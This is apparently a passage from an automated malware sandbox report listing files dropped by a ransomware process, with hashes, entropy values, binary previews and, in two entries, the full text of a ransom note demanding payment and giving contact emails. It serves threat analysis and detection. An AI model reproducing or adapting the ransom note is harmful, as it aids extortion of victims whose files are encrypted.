                                                                                                                                            Preview:.;I=4..[...P.#.,.:..w.7..]'...M..l.o.-..^..`.U.Y...H..o..B...(<h.y...^.Oj....o.Vv...D..(.LCD~..{e..L....>.Rj}/"..w...;L....N...<0.kS-.!A.#.zEbF..@to >."..M....o....D.7^.9..c/:.,.....I....s....%K.@;K...#pD..~.5zc.}Mx..`.....s.].O.'...^....A^...-..W...Q..I.*rZN...0...KO.........I4..X.w..{7i.1|.U._..p..$....V...+.Uy..XB.......I........$7s.z..a.....:bW.....1(..n.Iu..k.|.&.AY!.D..R ..U.Ct;.......`c....=...;...._.}........a...f$.9..F@.K6r..5..2re...l.....o....`...BR..[e.&X.@.....(e.r...N............j....Z0.Z.........Nh..J.(..\..5i.I..u.k.U..#.H.....N.9....?....e.p?F]K.....B..6....?...K....X...n{.K..*..P.+.N..j>1.(!..X..'.....w.G`Z?.I.nG....d...K..I..r&..o*...t._.......@.)...._._..k......0....\B..:..P......AXw..w...H.._.u.i.<|...Y.L...m...R.xj.4}.W..."GXv.z..U.#..u...a..)O.K.5....<K.`..7}BW..7..e..i..7:.R..].=O.t.....U..F.8U.nk|...F..\Q.o..!..dHg.[..............D..zR.~.....(R[.2..N..[.*...i.5.Jf.T..`.KgA..Pz...}}.'\.&m...Y.._+Zi...}
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):33034
                                                                                                                                            Entropy (8bit):1.6058504907292745
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:xKld2SwDSfXhUKB8gDaMGws8Ry4pYOuPKjz0X:ukVDSfhSgD5t44pAx
                                                                                                                                            MD5:104B42728701375F64DDB2D63DF6D857
                                                                                                                                            SHA1:327236FCCAB1DB64084D9B3E88CAD1C74B9A6BEA
                                                                                                                                            SHA-256:C57F9AB53EC09252504E015DE843D245BE07FC5CE2582901E088527D0AFA3177
                                                                                                                                            SHA-512:842D54AFC6FABCD11F355D86FB0C4F250708E4B4DEF1F24F655BC2C967D8024E6FDB8323A6CB295CB7EF19A659B19561393654A088B6E59B506EA4546EF3F678
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:...,#...5.Txu.%....x..y.CuODu..%.+..}.,..M,.q?.-.w.9........t.....2#a.PYgTe7I.{..o.,1.g.....Sn.d..s...?....C]......;..V...._..>..^0..n&G.#....`....;.{!.%.`..qi.J.tN.8.9..Y.J.q....e..X.%..U.........$X...>../O..$2..e..J.5.G...=fHuVa./...`;.N[..`.`.a.Y3.....N.. ].O;j...}.1.(. ...MxK..."..(..A,.....I.'..".A.n.....~....N...U......p...J..f..zn0...n.rKf.N.$.5....;....vA...e.."}..B~........{.e...........h..W!.r#../H.Fx.D.. ..2...tE...O..\..+i....R!......3Q..e..5.X..g..,.w..}.".5l....Z(Rt....6..........6a.`.-.%]O.<]......./............."...!.......=.)l..+/...%#fMs.....Tc.F8T=.\#.8.J[&.e)t..;.......Q.D....g..98....E..l...e.K..._r.....I...AWH.M......j.z.Z.3k..:.`....`.S.x.QRZ.4..J.....P.&.2...u..#...A"c.....V......{-.v..764.{.y..JP..5.&.I..2..Ad...>.)...a...s.%.e&8A..;].......8Mw...&.M.....b`....#I.4.Mx).w.v/..%..i....Lm.X..[..?.2Z..f.....w49gi.\.o..N..g..*Y%...=.x..~8.)Um..V.Mia!....,.X.L'....5..).W..5..J7..].aL_.Y\.m...m.5-...g..s..# }@....r?.kqqt8
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):33034
                                                                                                                                            Entropy (8bit):1.6058504907292745
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:xKld2SwDSfXhUKB8gDaMGws8Ry4pYOuPKjz0X:ukVDSfhSgD5t44pAx
                                                                                                                                            MD5:104B42728701375F64DDB2D63DF6D857
                                                                                                                                            SHA1:327236FCCAB1DB64084D9B3E88CAD1C74B9A6BEA
                                                                                                                                            SHA-256:C57F9AB53EC09252504E015DE843D245BE07FC5CE2582901E088527D0AFA3177
                                                                                                                                            SHA-512:842D54AFC6FABCD11F355D86FB0C4F250708E4B4DEF1F24F655BC2C967D8024E6FDB8323A6CB295CB7EF19A659B19561393654A088B6E59B506EA4546EF3F678
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...,#...5.Txu.%....x..y.CuODu..%.+..}.,..M,.q?.-.w.9........t.....2#a.PYgTe7I.{..o.,1.g.....Sn.d..s...?....C]......;..V...._..>..^0..n&G.#....`....;.{!.%.`..qi.J.tN.8.9..Y.J.q....e..X.%..U.........$X...>../O..$2..e..J.5.G...=fHuVa./...`;.N[..`.`.a.Y3.....N.. ].O;j...}.1.(. ...MxK..."..(..A,.....I.'..".A.n.....~....N...U......p...J..f..zn0...n.rKf.N.$.5....;....vA...e.."}..B~........{.e...........h..W!.r#../H.Fx.D.. ..2...tE...O..\..+i....R!......3Q..e..5.X..g..,.w..}.".5l....Z(Rt....6..........6a.`.-.%]O.<]......./............."...!.......=.)l..+/...%#fMs.....Tc.F8T=.\#.8.J[&.e)t..;.......Q.D....g..98....E..l...e.K..._r.....I...AWH.M......j.z.Z.3k..:.`....`.S.x.QRZ.4..J.....P.&.2...u..#...A"c.....V......{-.v..764.{.y..JP..5.&.I..2..Ad...>.)...a...s.%.e&8A..;].......8Mw...&.M.....b`....#I.4.Mx).w.v/..%..i....Lm.X..[..?.2Z..f.....w49gi.\.o..N..g..*Y%...=.x..~8.)Um..V.Mia!....,.X.L'....5..).W..5..J7..].aL_.Y\.m...m.5-...g..s..# }@....r?.kqqt8
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):292
                                                                                                                                            Entropy (8bit):7.207988234371653
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:gyFH2swOxSdvS8P1d9QoluELcr0jDk3Fv9bkzB96I+ExcS52G0QM+Hn:gyF9ws8P1d23raA3WBYlS52DQM+Hn
                                                                                                                                            MD5:9F51A013A098CEC2710815AA4FEE84AB
                                                                                                                                            SHA1:D12C1E81D9C6822FC595C9EAF854607B9721AFB1
                                                                                                                                            SHA-256:B7486C68FA486EE0243716674EFED1B8532ADFDEEE62AE79600C0AD2E6891443
                                                                                                                                            SHA-512:711BC0D4FA78DE9928ABF17F95B31886427815EA92C2A1D34DD031E88E8424EDF48C776D32FA52D862B9DE3018F8BD56079A42D152C7B832F8CD101728C72406
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:C..... tkz@.8...........7"..."...:...vT(.n.5..._..r#]u..D..-[...b..)..4'4^....Y....Qp..FY.V~b.Du|._R.......W..J...km.h......}....,a...8.{{..$f.W......&..._...&.~,3...lB&..i..+.E.......<A\D..s.H.....vD..P..&i..k%v..t....S..Ns~.........sX\....b~...~..c..$...7.?.S..T..J...G0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):49418
                                                                                                                                            Entropy (8bit):1.1511457344713445
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:R/HDgLDrVCuvTLQKbuH7Vs5y2f1RQtmdMEz4ZLIqLPBqFT71EibUjY:Ri/vTLxbu+42f1itmqxIqL21ElM
                                                                                                                                            MD5:0B58DD34895BF8B4A2DDBB5102821C9D
                                                                                                                                            SHA1:BB7D88E8CE5AAC0626F2CF06140187A9B935B19F
                                                                                                                                            SHA-256:0509F6EA13C4B430FE8BF1558D2DCB738B5462482E58D2D7F29D133068075117
                                                                                                                                            SHA-512:B6D7F03947E3106BE50B5CC4196BF9FE2D893F0F3FC3A688542FCEC5754DE177C79FE3AE6335B3D11FA2B556DAC71CC9E1ADD74E3B22BA1B23C18E40262D7E93
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.;I=4..[...P.#.,.:..w.7..]'...M..l.o.-..^..`.U.Y...H..o..B...(<h.y...^.Oj....o.Vv...D..(.LCD~..{e..L....>.Rj}/"..w...;L....N...<0.kS-.!A.#.zEbF..@to >."..M....o....D.7^.9..c/:.,.....I....s....%K.@;K...#pD..~.5zc.}Mx..`.....s.].O.'...^....A^...-..W...Q..I.*rZN...0...KO.........I4..X.w..{7i.1|.U._..p..$....V...+.Uy..XB.......I........$7s.z..a.....:bW.....1(..n.Iu..k.|.&.AY!.D..R ..U.Ct;.......`c....=...;...._.}........a...f$.9..F@.K6r..5..2re...l.....o....`...BR..[e.&X.@.....(e.r...N............j....Z0.Z.........Nh..J.(..\..5i.I..u.k.U..#.H.....N.9....?....e.p?F]K.....B..6....?...K....X...n{.K..*..P.+.N..j>1.(!..X..'.....w.G`Z?.I.nG....d...K..I..r&..o*...t._.......@.)...._._..k......0....\B..:..P......AXw..w...H.._.u.i.<|...Y.L...m...R.xj.4}.W..."GXv.z..U.#..u...a..)O.K.5....<K.`..7}BW..7..e..i..7:.R..].=O.t.....U..F.8U.nk|...F..\Q.o..!..dHg.[..............D..zR.~.....(R[.2..N..[.*...i.5.Jf.T..`.KgA..Pz...}}.'\.&m...Y.._+Zi...}
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):49418
                                                                                                                                            Entropy (8bit):1.1818396308803936
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:2Sp/9Z5l2pYS+AP9BfZvpcaf3SYU2gC9QQn5xPDcHbl:2SplkpYS+A9vf3jU2DPDcHx
                                                                                                                                            MD5:4C30DD10483B9AD80ADF619182B4A471
                                                                                                                                            SHA1:76708160F79C53FE01BEF52A7861A21B2B8730E1
                                                                                                                                            SHA-256:97082D488108E46155509C0DC7A7249A8C3FA60A2A562C37CC92A8AAF30FB8DD
                                                                                                                                            SHA-512:CB50108A796E6884144C78A91F0B13EF8693C2A2DCEB38020CC28EFA6C7DA0461818099172E07387A48980CF8913409BB502DE5134CCAC4CEFA9F67F8AE0FD63
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:........iR.H..0...M..?%..`....{p4.[.2G^..O........<.I4..@...#$_..L....,........YVG.o$.IG......F+l[r........8....V...........O..Dz.RZ#.G..L..C9...e$........3......5.k]s$q...If....*v4c......%......b.....^`....$\.`.a\......S\5vl.......o.7....._....#y...sT..p....p_V..Z.+<..\.]........5(....'... ... .....l...c.#...... ..<.p..I^F..`.......p.K....a..V.I.!\r.. b.<.AGj.Z5.7.=.....y...M......k....'}MR......~...Y...;..7\..Q.(#..Q.|.w........t.=(.J[Vu..$Z:.Auhi.P.....9@..O$Jj... ...D.O..._&Z....{pQ...\..\.q.. .Z.!F.$....)Bg..al.v..cj;....%5.&%.1.j.w.[...".9..i..J.4...U|..6...;"...h..qVd.X....l.d.dl.............6...k........?.OU.'.......fD..].......|6...........T..0t .bb.r0O.S....Z..mR>..!W@p..D_..,>%........=..1g......>-;.&..;*Q..4[i......1#.D!.$..G._....1..X..V.U..J"*..x.b.4...H.p.O......p.x.`..m..'...,..A.H`.5.1A...u..@.8..#f..g5.L.Xc..vRL....mJ.~8BA...5.bk..../..;w....OD.p....L..g....z.L.8^a..9....X..V..~.m...RC...........5.t.%3...C.@..`<k.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):33034
                                                                                                                                            Entropy (8bit):1.6071300838033933
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:ufFgZ3DCan5AE6F3TxR57RTMxj2nrI2FnOLDE:ufF1yAE6dxR/wxinfNOLDE
                                                                                                                                            MD5:3BDC0F461CF05A3BB33CEF1CFF8E0099
                                                                                                                                            SHA1:B8E81EE223F41504421A0F4A4BF02B9A51576959
                                                                                                                                            SHA-256:632631E473B8C4CC3C82172AC409C94EE57C90CAE6D4377F31617532D9AE5514
                                                                                                                                            SHA-512:129A6602E38B7D0F1D51B3289292924CC9F72942888D811136C4B6F8350E483C59382C76F76B4F0547FF8E69BE815BE03F0CA719E6EC5CA2C47167B3AC67B2BE
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:b...kK9.?..;@#.d....X...N.~t.U.....G.Kb^.TU.5...r..@...7.tt01....3.B..h)......&...GU%..........n.Bf...C..y.g...r.V.]a[M.'dtNN.z.8l.2..b...XyyT.......v.Ix.B...@A.uC.C]....V..9..k....!$Rj...!(.0"...R...\.1..F.f....D.../....N.+..W.D..j..N...Vo..q.....F.rC....j~.....p/d..z.....).........p.1......../.O.......P9.#..X...7....N.[!c./...'.t..[.[/....^?.>1.C.$?z"s..3/.n..z.+J...*.B.&V..1.;.?...5t.[T.+~..oQ...X_......-...WK.p\.#;.......m..f....../..,.2.L..I..V-u<..EN-.._[x......5..Z~ahza+......E........I......-r.V.......R..^.....c.....s..<.7.7....O$...d.|..1...M..[.D..G......B.....fh7 S(.=.H.}D...p.j\S.....^..a.....^E.....%A...t....j.Xmf.O~+ .1....;.......%........vPb. $:z."2..1#..`P..l.G...h.......Uz.T.. .wN....$^.k~L.X......\.....]..H.....M^H+=.Xc....KOI(..}P..D.1...L4.SO.(...U.&..f..>.v..kd.]m...t'..~K.....e.l...i..<.....rt;..oH....y.l.f.......F...c*....(.....q-..n.Z-P.......?..j.eBZ%9kMX...]i:X....&....5.SIA..i`...... n.*......)......[W....j
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):33034
                                                                                                                                            Entropy (8bit):1.6071300838033933
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:ufFgZ3DCan5AE6F3TxR57RTMxj2nrI2FnOLDE:ufF1yAE6dxR/wxinfNOLDE
                                                                                                                                            MD5:3BDC0F461CF05A3BB33CEF1CFF8E0099
                                                                                                                                            SHA1:B8E81EE223F41504421A0F4A4BF02B9A51576959
                                                                                                                                            SHA-256:632631E473B8C4CC3C82172AC409C94EE57C90CAE6D4377F31617532D9AE5514
                                                                                                                                            SHA-512:129A6602E38B7D0F1D51B3289292924CC9F72942888D811136C4B6F8350E483C59382C76F76B4F0547FF8E69BE815BE03F0CA719E6EC5CA2C47167B3AC67B2BE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:b...kK9.?..;@#.d....X...N.~t.U.....G.Kb^.TU.5...r..@...7.tt01....3.B..h)......&...GU%..........n.Bf...C..y.g...r.V.]a[M.'dtNN.z.8l.2..b...XyyT.......v.Ix.B...@A.uC.C]....V..9..k....!$Rj...!(.0"...R...\.1..F.f....D.../....N.+..W.D..j..N...Vo..q.....F.rC....j~.....p/d..z.....).........p.1......../.O.......P9.#..X...7....N.[!c./...'.t..[.[/....^?.>1.C.$?z"s..3/.n..z.+J...*.B.&V..1.;.?...5t.[T.+~..oQ...X_......-...WK.p\.#;.......m..f....../..,.2.L..I..V-u<..EN-.._[x......5..Z~ahza+......E........I......-r.V.......R..^.....c.....s..<.7.7....O$...d.|..1...M..[.D..G......B.....fh7 S(.=.H.}D...p.j\S.....^..a.....^E.....%A...t....j.Xmf.O~+ .1....;.......%........vPb. $:z."2..1#..`P..l.G...h.......Uz.T.. .wN....$^.k~L.X......\.....]..H.....M^H+=.Xc....KOI(..}P..D.1...L4.SO.(...U.&..f..>.v..kd.]m...t'..~K.....e.l...i..<.....rt;..oH....y.l.f.......F...c*....(.....q-..n.Z-P.......?..j.eBZ%9kMX...]i:X....&....5.SIA..i`...... n.*......)......[W....j
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:OpenPGP Secret Key
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):292
                                                                                                                                            Entropy (8bit):7.207043555372507
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:FX39JSAuUGN2nJ2vuNjxmKPwhggQP1Z7rFs25vnVoKvySSSn:19JSAuU21vgjUKPwgZvm2FuEfn
                                                                                                                                            MD5:C4E886FB52BFBC7D2FC9A75436DC1E6C
                                                                                                                                            SHA1:F4208EF1DF982AA2D29FB6135555AC54FEBA1568
                                                                                                                                            SHA-256:B76588260D51853915C6EE482019B2805ECD2835B9B368DF90C3909031C30572
                                                                                                                                            SHA-512:143400032386400C7EE6AD9D6EB5133DF18E910EFB03AB8AF81D6CB5AE54A05C3FBFEB1F982DEDD4324933238CEA511F58A6D3697714C52159A195C47F197B21
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:.I..L.o..)x..~.3............!P@;cX0....n9......V_...P.....15.{(A...SP.&..{....]."njz>.........u..5...(g......5...n.u....k..D].&....C..y...x*B.a..x.k/W..H...z....a../..;.4.F#..d.N'..;n...Z..7.y.....kS=......C..e..w...#pJ....*.u..6.2.... I...fE...b..y..g..|kT...$.[..?J...0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):49418
                                                                                                                                            Entropy (8bit):1.1818396308803936
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:2Sp/9Z5l2pYS+AP9BfZvpcaf3SYU2gC9QQn5xPDcHbl:2SplkpYS+A9vf3jU2DPDcHx
                                                                                                                                            MD5:4C30DD10483B9AD80ADF619182B4A471
                                                                                                                                            SHA1:76708160F79C53FE01BEF52A7861A21B2B8730E1
                                                                                                                                            SHA-256:97082D488108E46155509C0DC7A7249A8C3FA60A2A562C37CC92A8AAF30FB8DD
                                                                                                                                            SHA-512:CB50108A796E6884144C78A91F0B13EF8693C2A2DCEB38020CC28EFA6C7DA0461818099172E07387A48980CF8913409BB502DE5134CCAC4CEFA9F67F8AE0FD63
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:........iR.H..0...M..?%..`....{p4.[.2G^..O........<.I4..@...#$_..L....,........YVG.o$.IG......F+l[r........8....V...........O..Dz.RZ#.G..L..C9...e$........3......5.k]s$q...If....*v4c......%......b.....^`....$\.`.a\......S\5vl.......o.7....._....#y...sT..p....p_V..Z.+<..\.]........5(....'... ... .....l...c.#...... ..<.p..I^F..`.......p.K....a..V.I.!\r.. b.<.AGj.Z5.7.=.....y...M......k....'}MR......~...Y...;..7\..Q.(#..Q.|.w........t.=(.J[Vu..$Z:.Auhi.P.....9@..O$Jj... ...D.O..._&Z....{pQ...\..\.q.. .Z.!F.$....)Bg..al.v..cj;....%5.&%.1.j.w.[...".9..i..J.4...U|..6...;"...h..qVd.X....l.d.dl.............6...k........?.OU.'.......fD..].......|6...........T..0t .bb.r0O.S....Z..mR>..!W@p..D_..,>%........=..1g......>-;.&..;*Q..4[i......1#.D!.$..G._....1..X..V.U..J"*..x.b.4...H.p.O......p.x.`..m..'...,..A.H`.5.1A...u..@.8..#f..g5.L.Xc..vRL....mJ.~8BA...5.bk..../..;w....OD.p....L..g....z.L.8^a..9....X..V..~.m...RC...........5.t.%3...C.@..`<k.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):49418
                                                                                                                                            Entropy (8bit):1.1546993464370803
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:0N2ZhY1kseYQWBcIdPbC16QZKvRw6itcbVVkv69bjxa+wn:B3CSePWDZSstk669bjxGn
                                                                                                                                            MD5:A1373F6BAC4B5B410041B9A28DD5179B
                                                                                                                                            SHA1:CACA9671A6D4268E78407514C1ABE63440AB4621
                                                                                                                                            SHA-256:718090CC819BF363C645822A155E5973AD28483437E902752CE85F40A5A18539
                                                                                                                                            SHA-512:4D1AEBA5A092A4307E4613FED345684636369BEE115D8E4328384665EA5966C97E5D7FD51D00C8D315903E79DFEEEA10D831763BEC44600AF4905DF9CD2EF77D
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:h..c[.J...2pEYI.....{F..z.....Se..].GT..Ppc.@.H....w4s.H.?(X)+.......S.).>....u...j.I{z..N.Ld%.i..}..o@.......c.P...:...T.sln.];.(y.*.o.....'....*(.... ..S.2n...?l..#..@V........s.&r...y....+.M.`]...2.G........F..8.)...l...#.v...Nrn.....&.....g.#....0..."..a...R.M...)w.....A...J....+..<..B... .."w....I6.:...BG=.T....w...xW..>.^..............iq.....]....*v.f...@..^.......h....(.v.....HI.......$/...o\.n..c.2h..)..........o3...aB42..v...@.,..q..[.yE.{..I....A.g...5..u.a8....0...m.o,..+...l.-5..t..#'h|...S.9A.......f.......oT*f..P.d...^.....F*H.."/V.....WirH.$...=..).y....h.6...L..%6.B.xC..E..)...;..$7{..M..v..o.q.=.w1TE..R.]..)B...N.......O3..G.B.X..>YC&l..1....N...?N....(....}....BJ).i+..5.kr..6...p`FY%..x....c...A.].t.......?....?|..J....8;..G....~....L.)......._..j.x.....=.R._{>.*......h.O)..........t..*k7.,...(.=.S.iZQ.......F.(.7Dy0..GU].<08.{....mf.O_...yEe.uta..v..~ .n.j.0..j..*NxH.....0........zkO...e..>...U..........Y,
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):33034
                                                                                                                                            Entropy (8bit):1.6100136465131174
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:3ovDEZwl8MJHQt3Od2DCeIRUPbx9WIJHF3T79aTMii:4z8MwGACeIRoxMITXOi
                                                                                                                                            MD5:F54EA823DC46980895231518C238F93E
                                                                                                                                            SHA1:868B4ABFB23B19ED8421965D7FF3F0DBC13B46AB
                                                                                                                                            SHA-256:1A043C5B45D6D6F2325C900A15E62C289F09C0401762263B06C9518BF6B36894
                                                                                                                                            SHA-512:6530494A8784D515ED0739C3300D4F15F1A4E0D8ADDD0DD52C47F4D22DF62241B2282A72B8E6D8A7540D961713124876DFF36191B2C55E37EA7B30BBBC0110DF
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:.1..:...3.=3..3..K.Z."..,........=Z....YO.UK-#..G........K..(..N.t....c..od.0.LH]b2y.;..:E(t..W.b3l...}..S.s..!f......f.u.Et/q.{.t...`... ...QL.X>Q.oD..m\.I;......n-.b.W.#..).s...0....V.....c..r..L..Y..e.)U...J.....l.o+.#....R..7I..X?4...FZ.!..n...o.>....A$..Q..i|/.........Y1B..,<.bU......|..............>{.h,$U...R..GdVs(.a.........+d...^....0%..\...Z.;.......6&..l-...0...W.WSo..7.WL..."..x..{6.&c...i.Sn.o.......B...k$..c.K. U.E..I.]..U.i...e..1...{._!RpFX`.(k.d...\.J.w.'k..:.Y..K....j...p...8~R.P..J....I3..w...t8F.../......U.w.4q9..4s.."1.5SK...b...p)...%..2._.c........P.0.)!./R7.x.\..z,/.,.n...._.%.=...w. ........4......XKa.FD.[W..{.c.P.2.1 j....#.J..E.>.....3.......I...1..h;D..q.......y.| .....a.>.q.5..,...#.S..KL...8..r9.vs..UG..z.(D'?.'y.)L..2...x.N....U.....a..xx|K..........i{`..T...y.z.N%W3..9w2,.D..v.....E.$....}.....g1..{}[y.5J..KXS6..Mu..~.....5.`...g...g.....V+.IB....5;..$...I....+i.a-..$*...w.w.r....Y........f...31.].I.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):33034
                                                                                                                                            Entropy (8bit):1.6100136465131174
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:3ovDEZwl8MJHQt3Od2DCeIRUPbx9WIJHF3T79aTMii:4z8MwGACeIRoxMITXOi
                                                                                                                                            MD5:F54EA823DC46980895231518C238F93E
                                                                                                                                            SHA1:868B4ABFB23B19ED8421965D7FF3F0DBC13B46AB
                                                                                                                                            SHA-256:1A043C5B45D6D6F2325C900A15E62C289F09C0401762263B06C9518BF6B36894
                                                                                                                                            SHA-512:6530494A8784D515ED0739C3300D4F15F1A4E0D8ADDD0DD52C47F4D22DF62241B2282A72B8E6D8A7540D961713124876DFF36191B2C55E37EA7B30BBBC0110DF
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.1..:...3.=3..3..K.Z."..,........=Z....YO.UK-#..G........K..(..N.t....c..od.0.LH]b2y.;..:E(t..W.b3l...}..S.s..!f......f.u.Et/q.{.t...`... ...QL.X>Q.oD..m\.I;......n-.b.W.#..).s...0....V.....c..r..L..Y..e.)U...J.....l.o+.#....R..7I..X?4...FZ.!..n...o.>....A$..Q..i|/.........Y1B..,<.bU......|..............>{.h,$U...R..GdVs(.a.........+d...^....0%..\...Z.;.......6&..l-...0...W.WSo..7.WL..."..x..{6.&c...i.Sn.o.......B...k$..c.K. U.E..I.]..U.i...e..1...{._!RpFX`.(k.d...\.J.w.'k..:.Y..K....j...p...8~R.P..J....I3..w...t8F.../......U.w.4q9..4s.."1.5SK...b...p)...%..2._.c........P.0.)!./R7.x.\..z,/.,.n...._.%.=...w. ........4......XKa.FD.[W..{.c.P.2.1 j....#.J..E.>.....3.......I...1..h;D..q.......y.| .....a.>.q.5..,...#.S..KL...8..r9.vs..UG..z.(D'?.'y.)L..2...x.N....U.....a..xx|K..........i{`..T...y.z.N%W3..9w2,.D..v.....E.$....}.....g1..{}[y.5J..KXS6..Mu..~.....5.`...g...g.....V+.IB....5;..$...I....+i.a-..$*...w.w.r....Y........f...31.].I.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):292
                                                                                                                                            Entropy (8bit):7.180710610754667
                                                                                                                                            Encrypted:false
